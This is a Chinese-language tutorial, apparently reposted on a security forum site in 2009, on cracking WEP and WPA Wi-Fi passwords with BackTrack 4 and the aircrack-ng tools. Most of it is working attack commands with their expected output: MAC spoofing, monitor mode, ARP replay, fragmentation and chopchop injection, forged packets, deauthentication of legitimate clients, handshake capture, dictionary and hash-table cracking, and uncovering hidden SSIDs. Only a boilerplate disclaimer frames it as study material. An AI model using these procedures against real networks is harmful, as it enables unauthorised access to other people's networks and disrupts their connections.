欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

BT4无线网络破解教程之一

来源:转载 作者:佚名 时间:2009-12-01 TAG: 我要投稿
1.下载光盘版BT4.iso,copy其中的boot和bt4到U盘,windows下运行bootinst.bat安装到U盘。VM版的BT4可能对集成的无线网卡支

  持不太好,USB无线网卡则支持得很好。

  或者用硬盘启动方式:下载光盘版BT4.iso,解压其中的boot和bt4到D盘根目录,下载grub4dos,解压其中的grldr、menu.lst、

  grldr.mbr,放C盘根目录下

  编辑bcd:

  bcdedit /create /d "Grub" /application bootsector

  回显: 项 {5e098857-4818-11de-b43e-001eec90feb6} 成功创建。

  接着用下面的指令来设置引导参数,{id}替换为上面回显的ID,建议用复制粘贴

  bcdedit /set {id} device boot

  bcdedit /set {id} path \grldr.mbr

  bcdedit /displayorder {id} /addlast

  设置等待时间

  bcdedit /timeout 5

  (

  如果要卸载,运行

  bcdedit

  查看Grub的{id}后,

  bcdedit /delete {id}

  )

  2.启动BT4,选console控制台模式,用户名root,密码toor<注意不是root>,再运行sta盘盘rtx启动窗口模式。

  另:BT4启动黑屏问题解决办法

  输入root toor 登录系统后在输入 fixvesa 然后 startx如果不行就输入 fixvmware,然后输入startx.还是不能就输入Xorg -

  configure 然后startx

  我的笔记本产U盘启动BT4,startx时按住空格可以进入.。

  问题:我在启动bt3 的时候,输入startx黑屏

  解答:在输入用户名root 和密码toor 以后输入xconf 这时会黑屏一会,然后出来提示符再输入startx 可进入

  win窗口;当实在不能进入win窗口的时候你也可以直接在提示符下输入各破解命令,同时可用alt+f1 打开

  一个shell,alt+f2 打开第二个shell,alt+f3 打开第三个等。关闭窗口用PRINT SCREEN 键

  ---------------------end---------------------

  [] 可选

  <>回显

  / 或者

  () 提示

  ---------------------WEP---------------------

  shell 1:----------------------------------------

  1.ifconfig -a

  <wlan0 ... xx:xx:xx:xx:xx:xx>

  [

  macchanger -m 00:11:22:33:44:55 wlan0

  <修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入>

  ]

  2.ifconfig -a wlan0 up

  (5100可能要加载网卡才支持注入?)

  3.airmon-ng start wlan0 6

  <monitor mode enabled on mon0>

  (6是频道)

  另一说5100要支持注入用airmon-ng start wlan0

  如果这里回显<(monitor mode enabled)> 则下面命令所有端口号要用"wlan0"

  [

  aireplay-ng -9 mon0 / aireplay-ng --test mon0

  <Injection is working/No anwser>(注入攻击成功/不成功)

  (检测你的网卡是否支持注入)

  ]

  4.airodump-ng -w pack -c 6 mon0/wlan0

  (pack是随便起的获取的ivs的保存文件的名字)

  另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0

  shell 2:----------------------------------------

  一、有客户端:

  破解:abcd四种方式

  a.合法客户端产生大量有效的数据,能直接获得大量cap。

  收到10000以上data后,直接转shell 3,破解密码

  b.合法客户端只能产生少量数据,就需要注入<-3>攻击加速产生大量数据。

  5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行)

  <Read 11542 packets <got 12587 ARP ...>,send 71524 packets ... 很多类似行>

  c.合法客户端不在通信,注入模式不成功,

  用-0 冲突模式强制断开合法客户端和ap连接,使之重新连接,

  新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入

  5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan0

  6.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0

  (可能要另开窗)

  d.有客户端,并且客户端能产生有效arp 数据的另类破解方式

  输入modprobe –r iwl3945

  (加载网卡)

  输入modprobe ipwraw

  输入airmon-ng start wlan0 6

  现在,只要一个命令就搞定,输入:

  输入wesside-ng -i wlan0 -v 01:02:03:04:05:06<此格式的APmac>。

  <key: 12:34:56:78:90>

  二、无客户端:

  5.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0

  (我成功了)

  另一说用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0

  <Authentication successful>

  <Association successful>

  (建立虚拟伪装连接)

  如果失败可尝试降低网卡速率后再试:iwconfig mon0 rate 2M(注意大写)

  破解:abcd四种方式

  a.-2 crack mode ---------------

  建立虚拟连接后直接用-2交互攻击模式集合了抓包,提数据和发包攻击

  6.aireplay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0

  发包成功后可得到足够的ivs,然后用aircrack-ng破解

  b.-3 crack mode ---------------

  6.aireplay-ng -3 -b (AP mac) -h (MY mac) mon0

  7.用aircrack-ng破解<自己添加的步骤?>

  c.-4 crack mode ---------------

  -4攻击模式;制造数据包;-2交互式攻击模式

  6.aireplay-ng -4 -b (APmac) -h (Mymac) mon0

  <?yes>

  <Saving keystream in replay_dec-0523-075615.xor>

  7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 –l 255.255.255.255 -y replay-xxx.xor -w myarp

  (提取上面xor 文件来伪造一个arp包)

  8.aireplay-ng -2 -r myarp mon0

  一说用aireplay-ng -2 -r myarp -x 512 mon0

  (发现了可利用的myarp的数据包,按y后,立刻注入攻击。Date疯涨)

  9.用aircrack-ng破解

  d.-5 crack mode ---------------

  -5碎片攻击模式;制造数据包;-2交互式攻击模式

  (我成功过)

  6.aireplay-ng -5 -b (ap mac) -h (my mac) mon0

  <?yes>

  <Saving keystream in fragment-1216-201426.xor>

  (利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件(xor 文件))

  7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxx.xor -w myarp

  (Myarp随便起的文件名)

  <Wrote packet t myarp>

  8.aireplay-ng -2 -r myarp -x 256/512 mon0

  <?yes>

  (这时,前面的抓包窗口上的data 将迅速增加)

  (512是攻击速度,1024是最大值)

  9.采用aircrack-ng 来进行破解

  shell 3:----------------------------------------

  aircrack-ng *.cap

  如果shell 1用了--ivs 参数,则这里用aircrack-ng *.ivs

  (我成功了)

  另一说用aircrack-ng -n 64 -b APmac pack-01.cap

  <KEY FOUND! [......] <ASCII:XXXXX>>

  附:

  5100用BT4+spoonwep2破解

  1.把spoonwep2放在BT4\modules\下,启动BT4

  2.

  ln -fs bash /bin/sh

  ls -al /bin/sh

  <显示bash为成功,dash为失败>

  3.开spoonwep2,里面可以找到网卡了,选wlan0进入搜索,但这时不会搜出来什么,

  关闭一下spoonwep2再重启spoonwep2,

  这时网卡项里有一个mon0的,选mon0,driver选normal,mode选unknow victim,选定PO841 replay attack,点击launch后就等待密

  码的出来(sata数据包到30000个左右)。

  (注:论坛中的高手说spoonwep2支持5100AGN网卡注入式破解)

  ---------------------end---------------------

  ---------------------WPA---------------------

  1.ifconfig -a

  <wlan0 ... xx:xx:xx:xx:xx:xx>

  2.ifconfig -a wlan0 up

  3.airmon-ng start wlan0 6

  <monitor mode enabled on mon0>

  (6是频道)

  4.airodump-ng -w 12345 -c 6 mon0/wlan0

  (保存名为12345.cap)

  (-w:写入文件,-c:截取cap的频道)

  5.aireplay-ng -0 10 -a (ap mac) mon0/wlan0

  或者输入:aireplay-ng -0 10 -a (ap mac) -c (合法客户端mac) mon0/wlan0(wlan0可能不对)

  <18:56:20 Sending 64 directed DeAuth,... 一些类似行>

  (-c后面为合法无线客户端的MAC地址)

  (迫使AP重新与已连接的合法客户端重新握手验证)

  (攻击几次后可以做破解尝试。WPA破解不用等到数据Data 达到几万,

  因为它只要一个包含WPA握手验证包就可以了)

  Cap数据包破解:

  a.暴力破解

  6.aircrack-ng -x -f 2 12345*.cap

  另一说是用aircrack-ng -z -b (ap mac) 12345*.cap

  b.字典破解

  6.aircrack-ng -w password.txt 12345*.cap

  另一说是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap

  (

  -w:是字典破解模式

  Password.txt是你事先准备好的字典。

  技巧:可以在windows 下使用下载的字典工具生产字典,再在BackTrack3 下拷贝到/root 下(aircrack 默认

  的工作目录在/root)。

  请注意,破解WPA 密码的时间取决于密码难易程度,字典包含程度,内存及CPU 等。多则数小时。

  )

  c.把CAP数据包拷贝出来在WIN下用WinAircrack 破解

  启动WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.cap

  Wpa-)Dictionary file-)pswd.txt,点右下角Aircrack the key...

  <Key Found! [xxxxxxxx]>

  d.HASH破解

  6.genpmk -f dictionary.txt -d D-LINK.hash -s D-LINK (注意大小写)

  (Windows版本操作步骤与其Linux下版本完全一致)

  (

  参数解释:

  -f 这里跟上采用的字典

  -d 生成的Table文件名称

  -s 目标AP的ESSID

  )

  7.cowpatty -d D-LINK.hash -r *.cap -s D-LINK

  (

  参数解释:

  -d 导入WPA PMK Hash Table文件名称,下图中为dlink-birth.hash

  -r 事先捕获的WPA握手数据包

  -s 目标AP的ESSID

  )

  ---------------------end---------------------

  WPA破解,怎么知道有握手包被截获?

  airodump-ng监视窗右上角有提示:

  ...... WPA handshake: 00:90:4c:8e:00:65

  BT4抓包后,cap文件保存在哪?

  输入ls可以看到啊,默认在root下。

  如何获得合法端mac?

  windows下可以使用OmniPeek、Wireshark、Ethereal、Aircrack-ng for Windows等工具实现对客户端MAC的拦截,Linux可用

  Kismet、Aircrack-ng中的airodump-ng等来实现。需要注意的是,若目标网络采用WEP或者WPA加密的话,有时需先行破解再对数据

  包解密方可看到客户端MAC。

  前面第一个shell,如下若有station显示,bb:bb:bb:bb:bb:bb就是合法客户端mac

  BSSID STATION ...

  aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb

  如何查找隐藏的SSID?

  1.在BT4下先打开一个shell,输入

  airodump-ng 网卡端口

  2.打开另一个shell,输入

  aireplay-ng -0 10 -a AP'MAC -c 合法客户端'MAC 网卡端口

  可能这个命令由于频道不对会出错,这时就要多重输几次(如果不行,就是不是合法客户端,要再试其它的客户端),直到提示成功为止

  3.然后就可以在上个shell,看到显示出来的SSID。

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载